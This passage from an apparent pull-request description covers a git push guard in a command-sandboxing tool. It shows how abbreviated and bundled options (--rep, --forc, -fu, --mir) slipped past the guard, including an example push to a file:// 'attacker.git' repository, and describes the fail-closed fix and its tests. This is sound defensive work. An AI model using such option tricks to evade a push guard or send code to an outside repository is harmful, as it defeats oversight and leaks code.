Pushing to a bare path that is not a configured remote now fails closed. That is a deliberate behaviour change — push by remote name instead, or use the existing escape hatches.

## 3. Abbreviated and bundled options, found while reviewing the above

git's parse-options accepts unique prefixes and bundled shorts; the guard matched exact spellings only. Where they disagreed, the guard picked the wrong token as the first positional:

```
git push --rep origin file:///…/attacker.git feature   →  * [new branch]  feature -> feature
```

The same class defeated force-push prevention outright: `--forc`, `-fu`, `--al`, `--mir`, `--ta` all reached git while `--force` was correctly refused.

While a push guard is active, any option that cannot be bound exactly is now refused, naming the token and asking for the full spelling. The long-option list is transcribed from `git push -h` and is identical on git 2.50.1 and 2.55.0; an option a future git adds is refused rather than silently misparsed, which is the intended failure direction.

## Tests

Unit and e2e coverage for each destination shape (scp-style, `ssh://`, `https://`, `file://`, relative path) alone and with a refspec; the abbreviated and bundled forms; the exact spellings that must keep working (`-u`, `-o ci.skip`, `--push-option=`, `--receive-pack=`, `--delete`, `--` separator, and the rest); `allow_push` rules still binding to destination URLs per #382; and `cplt exec -- git push origin <default-branch>` refused identically to the `sh -c` form.

`cargo fmt`, `cargo clippy --all-targets -- -D warnings` and the full `cargo test` pass.